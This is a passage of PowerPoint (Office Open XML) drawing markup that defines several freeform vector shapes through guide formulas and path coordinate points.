                  <a:gd name="T40" fmla="*/ 0 w 105"/>
                  <a:gd name="T41" fmla="*/ 0 h 61"/>
                  <a:gd name="T42" fmla="*/ 0 w 105"/>
                  <a:gd name="T43" fmla="*/ 0 h 61"/>
                  <a:gd name="T44" fmla="*/ 0 w 105"/>
                  <a:gd name="T45" fmla="*/ 0 h 61"/>
                  <a:gd name="T46" fmla="*/ 0 w 105"/>
                  <a:gd name="T47" fmla="*/ 0 h 61"/>
                  <a:gd name="T48" fmla="*/ 0 w 105"/>
                  <a:gd name="T49" fmla="*/ 0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5"/>
                  <a:gd name="T76" fmla="*/ 0 h 61"/>
                  <a:gd name="T77" fmla="*/ 105 w 105"/>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5" h="61">
                    <a:moveTo>
                      <a:pt x="1" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>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3093" name="Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="523" y="2483"/>
                <a:ext cx="10" cy="12"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 37"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 0 h 37"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 0 h 37"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 0 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 37"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 0 h 37"/>
                  <a:gd name="T12" fmla="*/ 0 w 33"/>
                  <a:gd name="T13" fmla="*/ 0 h 37"/>
                  <a:gd name="T14" fmla="*/ 0 w 33"/>
                  <a:gd name="T15" fmla="*/ 0 h 37"/>
                  <a:gd name="T16" fmla="*/ 0 w 33"/>
                  <a:gd name="T17" fmla="*/ 0 h 37"/>
                  <a:gd name="T18" fmla="*/ 0 w 33"/>
                  <a:gd name="T19" fmla="*/ 0 h 37"/>
                  <a:gd name="T20" fmla="*/ 0 w 33"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 0 w 33"/>
                  <a:gd name="T23" fmla="*/ 0 h 37"/>
                  <a:gd name="T24" fmla="*/ 0 w 33"/>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37"/>
                  <a:gd name="T41" fmla="*/ 33 w 33"/>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37">
                    <a:moveTo>
                      <a:pt x="0" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>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3094" name="Freeform 98"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="566" y="2421"/>
                <a:ext cx="38" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 115"/>
                  <a:gd name="T1" fmla="*/ 0 h 115"/>
                  <a:gd name="T2" fmla="*/ 0 w 115"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 0 w 115"/>
                  <a:gd name="T5" fmla="*/ 0 h 115"/>
                  <a:gd name="T6" fmla="*/ 0 w 115"/>
                  <a:gd name="T7" fmla="*/ 0 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 115"/>
                  <a:gd name="T9" fmla="*/ 0 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 115"/>
                  <a:gd name="T11" fmla="*/ 0 h 115"/>
                  <a:gd name="T12" fmla="*/ 0 w 115"/>
                  <a:gd name="T13" fmla="*/ 0 h 115"/>
                  <a:gd name="T14" fmla="*/ 0 w 115"/>
                  <a:gd name="T15" fmla="*/ 0 h 115"/>
                  <a:gd name="T16" fmla="*/ 0 w 115"/>
                  <a:gd name="T17" fmla="*/ 0 h 115"/>
                  <a:gd name="T18" fmla="*/ 0 w 115"/>
                  <a:gd name="T19" fmla="*/ 0 h 115"/>
                  <a:gd name="T20" fmla="*/ 0 w 115"/>
                  <a:gd name="T21" fmla="*/ 0 h 115"/>
                  <a:gd name="T22" fmla="*/ 0 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 115"/>
                  <a:gd name="T24" fmla="*/ 0 w 115"/>
                  <a:gd name="T25" fmla="*/ 0 h 115"/>
                  <a:gd name="T26" fmla="*/ 0 w 115"/>
                  <a:gd name="T27" fmla="*/ 0 h 115"/>
                  <a:gd name="T28" fmla="*/ 0 w 115"/>
                  <a:gd name="T29" fmla="*/ 0 h 115"/>
                  <a:gd name="T30" fmla="*/ 0 w 115"/>
                  <a:gd name="T31" fmla="*/ 0 h 115"/>
                  <a:gd name="T32" fmla="*/ 0 w 115"/>
                  <a:gd name="T33" fmla="*/ 0 h 115"/>
                  <a:gd name="T34" fmla="*/ 0 w 115"/>
                  <a:gd name="T35" fmla="*/ 0 h 115"/>
                  <a:gd name="T36" fmla="*/ 0 w 115"/>
                  <a:gd name="T37" fmla="*/ 0 h 115"/>
                  <a:gd name="T38" fmla="*/ 0 w 115"/>
                  <a:gd name="T39" fmla="*/ 0 h 115"/>
                  <a:gd name="T40" fmla="*/ 0 w 115"/>
                  <a:gd name="T41" fmla="*/ 0 h 115"/>
                  <a:gd name="T42" fmla="*/ 0 w 115"/>
                  <a:gd name="T43" fmla="*/ 0 h 115"/>
                  <a:gd name="T44" fmla="*/ 0 w 115"/>
                  <a:gd name="T45" fmla="*/ 0 h 115"/>
                  <a:gd name="T46" fmla="*/ 0 w 115"/>
                  <a:gd name="T47" fmla="*/ 0 h 115"/>
                  <a:gd name="T48" fmla="*/ 0 w 115"/>
                  <a:gd name="T49" fmla="*/ 0 h 115"/>
                  <a:gd name="T50" fmla="*/ 0 w 115"/>
                  <a:gd name="T51" fmla="*/ 0 h 115"/>
                  <a:gd name="T52" fmla="*/ 0 w 115"/>
                  <a:gd name="T53" fmla="*/ 0 h 115"/>
                  <a:gd name="T54" fmla="*/ 0 w 115"/>
                  <a:gd name="T55" fmla="*/ 0 h 115"/>
                  <a:gd name="T56" fmla="*/ 0 w 115"/>
                  <a:gd name="T57" fmla="*/ 0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
                  <a:gd name="T88" fmla="*/ 0 h 115"/>
                  <a:gd name="T89" fmla="*/ 115 w 11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 h="115">
                    <a:moveTo>
                      <a:pt x="0" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11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3095" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="609" y="2378"/>
                <a:ext cx="73" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 102"/>
                  <a:gd name="T2" fmla="*/ 0 w 224"/>
                  <a:gd name="T3" fmla="*/ 0 h 102"/>
                  <a:gd name="T4" fmla="*/ 0 w 224"/>
                  <a:gd name="T5" fmla="*/ 0 h 102"/>
                  <a:gd name="T6" fmla="*/ 0 w 224"/>
                  <a:gd name="T7" fmla="*/ 0 h 102"/>
                  <a:gd name="T8" fmla="*/ 0 w 224"/>
                  <a:gd name="T9" fmla="*/ 0 h 102"/>
                  <a:gd name="T10" fmla="*/ 0 w 224"/>
                  <a:gd name="T11" fmla="*/ 0 h 102"/>
                  <a:gd name="T12" fmla="*/ 0 w 224"/>
                  <a:gd name="T13" fmla="*/ 0 h 102"/>
                  <a:gd name="T14" fmla="*/ 0 w 224"/>
                  <a:gd name="T15" fmla="*/ 0 h 102"/>
                  <a:gd name="T16" fmla="*/ 0 w 224"/>
                  <a:gd name="T17" fmla="*/ 0 h 102"/>
                  <a:gd name="T18" fmla="*/ 0 w 224"/>
                  <a:gd name="T19" fmla="*/ 0 h 102"/>
                  <a:gd name="T20" fmla="*/ 0 w 224"/>
                  <a:gd name="T21" fmla="*/ 0 h 102"/>
                  <a:gd name="T22" fmla="*/ 0 w 224"/>
                  <a:gd name="T23" fmla="*/ 0 h 102"/>
                  <a:gd name="T24" fmla="*/ 0 w 224"/>
                  <a:gd name="T25" fmla="*/ 0 h 102"/>
                  <a:gd name="T26" fmla="*/ 0 w 224"/>
                  <a:gd name="T27" fmla="*/ 0 h 102"/>
                  <a:gd name="T28" fmla="*/ 0 w 224"/>
                  <a:gd name="T29" fmla="*/ 0 h 102"/>
                  <a:gd name="T30" fmla="*/ 0 w 224"/>
                  <a:gd name="T31" fmla="*/ 0 h 102"/>
                  <a:gd name="T32" fmla="*/ 0 w 224"/>
                  <a:gd name="T33" fmla="*/ 0 h 102"/>
                  <a:gd name="T34" fmla="*/ 0 w 224"/>
                  <a:gd name="T35" fmla="*/ 0 h 102"/>
                  <a:gd name="T36" fmla="*/ 0 w 224"/>
                  <a:gd name="T37" fmla="*/ 0 h 102"/>
                  <a:gd name="T38" fmla="*/ 0 w 224"/>
                  <a:gd name="T39" fmla="*/ 0 h 102"/>
                  <a:gd name="T40" fmla="*/ 0 w 224"/>
                  <a:gd name="T41" fmla="*/ 0 h 102"/>
                  <a:gd name="T42" fmla="*/ 0 w 224"/>
                  <a:gd name="T43" fmla="*/ 0 h 102"/>
                  <a:gd name="T44" fmla="*/ 0 w 224"/>
                  <a:gd name="T45" fmla="*/ 0 h 102"/>
                  <a:gd name="T46" fmla="*/ 0 w 224"/>
                  <a:gd name="T47" fmla="*/ 0 h 102"/>
                  <a:gd name="T48" fmla="*/ 0 w 224"/>
                  <a:gd name="T49" fmla="*/ 0 h 102"/>
                  <a:gd name="T50" fmla="*/ 0 w 224"/>
                  <a:gd name="T51" fmla="*/ 0 h 102"/>
                  <a:gd name="T52" fmla="*/ 0 w 224"/>
                  <a:gd name="T53" fmla="*/ 0 h 102"/>
                  <a:gd name="T54" fmla="*/ 0 w 224"/>
                  <a:gd name="T55" fmla="*/ 0 h 102"/>
                  <a:gd name="T56" fmla="*/ 0 w 224"/>
                  <a:gd name="T57" fmla="*/ 0 h 102"/>
                  <a:gd name="T58" fmla="*/ 0 w 224"/>
                  <a:gd name="T59" fmla="*/ 0 h 102"/>
                  <a:gd name="T60" fmla="*/ 0 w 224"/>
                  <a:gd name="T61" fmla="*/ 0 h 102"/>
                  <a:gd name="T62" fmla="*/ 0 w 224"/>
                  <a:gd name="T63" fmla="*/ 0 h 102"/>
                  <a:gd name="T64" fmla="*/ 0 w 224"/>
                  <a:gd name="T65" fmla="*/ 0 h 102"/>
                  <a:gd name="T66" fmla="*/ 0 w 224"/>
                  <a:gd name="T67" fmla="*/ 0 h 102"/>
                  <a:gd name="T68" fmla="*/ 0 w 224"/>
                  <a:gd name="T69" fmla="*/ 0 h 102"/>
                  <a:gd name="T70" fmla="*/ 0 w 224"/>
                  <a:gd name="T71" fmla="*/ 0 h 102"/>
                  <a:gd name="T72" fmla="*/ 0 w 224"/>
                  <a:gd name="T73" fmla="*/ 0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4"/>
                  <a:gd name="T112" fmla="*/ 0 h 102"/>
                  <a:gd name="T113" fmla="*/ 224 w 224"/>
                  <a:gd name="T114" fmla="*/ 102 h 10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4" h="102">
                    <a:moveTo>
                      <a:pt x="0" y="102"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>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3096" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="685" y="2375"/>
                <a:ext cx="14" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 44"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 44"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 44"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 44"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 44"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 44"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 44"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 44"/>
                  <a:gd name="T25" fmla="*/ 0 h 28"/>
                  <a:gd name="T26" fmla="*/ 0 w 44"/>
                  <a:gd name="T27" fmla="*/ 0 h 28"/>
                  <a:gd name="T28" fmla="*/ 0 w 44"/>
                  <a:gd name="T29" fmla="*/ 0 h 28"/>
                  <a:gd name="T30" fmla="*/ 0 w 44"/>
                  <a:gd name="T31" fmla="*/ 0 h 28"/>
                  <a:gd name="T32" fmla="*/ 0 w 44"/>
                  <a:gd name="T33" fmla="*/ 0 h 28"/>
                  <a:gd name="T34" fmla="*/ 0 w 44"/>
                  <a:gd name="T35" fmla="*/ 0 h 28"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 0 h 28"/>
                  <a:gd name="T38" fmla="*/ 0 w 44"/>
                  <a:gd name="T39" fmla="*/ 0 h 28"/>
                  <a:gd name="T40" fmla="*/ 0 w 44"/>
                  <a:gd name="T41" fmla="*/ 0 h 28"/>
                  <a:gd name="T42" fmla="*/ 0 w 44"/>
                  <a:gd name="T43" fmla="*/ 0 h 28"/>
                  <a:gd name="T44" fmla="*/ 0 w 44"/>
                  <a:gd name="T45" fmla="*/ 0 h 28"/>
                  <a:gd name="T46" fmla="*/ 0 w 44"/>
                  <a:gd name="T47" fmla="*/ 0 h 28"/>
                  <a:gd name="T48" fmla="*/ 0 w 44"/>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28"/>
                  <a:gd name="T77" fmla="*/ 44 w 44"/>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28">
                    <a:moveTo>
                      <a:pt x="1" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>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3097" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="731" y="2487"/>
                <a:ext cx="11" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 34"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 34"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 34"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 34"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 34"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 34"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 34"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 34"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 34"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 34"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 34"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 34"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 34"/>
                  <a:gd name="T25" fmla="*/ 0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3"/>
                  <a:gd name="T41" fmla="*/ 34 w 34"/>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3">
                    <a:moveTo>
                      <a:pt x="17" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17"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3098" name="Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683" y="2485"/>
                <a:ext cx="46" cy="8"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 141"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 141"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 0 w 141"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 0 w 141"/>
                  <a:gd name="T7" fmla="*/ 0 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 141"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 0 w 141"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 0 w 141"/>
                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                  <a:gd name="T14" fmla="*/ 0 w 141"/>
                  <a:gd name="T15" fmla="*/ 0 h 25"/>
                  <a:gd name="T16" fmla="*/ 0 w 141"/>
                  <a:gd name="T17" fmla="*/ 0 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 141"/>
                  <a:gd name="T19" fmla="*/ 0 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 141"/>
                  <a:gd name="T21" fmla="*/ 0 h 25"/>
                  <a:gd name="T22" fmla="*/ 0 w 141"/>
                  <a:gd name="T23" fmla="*/ 0 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 141"/>
                  <a:gd name="T25" fmla="*/ 0 h 25"/>
                  <a:gd name="T26" fmla="*/ 0 w 141"/>
                  <a:gd name="T27" fmla="*/ 0 h 25"/>
                  <a:gd name="T28" fmla="*/ 0 w 141"/>
                  <a:gd name="T29" fmla="*/ 0 h 25"/>
                  <a:gd name="T30" fmla="*/ 0 w 141"/>
                  <a:gd name="T31" fmla="*/ 0 h 25"/>
                  <a:gd name="T32" fmla="*/ 0 w 141"/>
                  <a:gd name="T33" fmla="*/ 0 h 25"/>
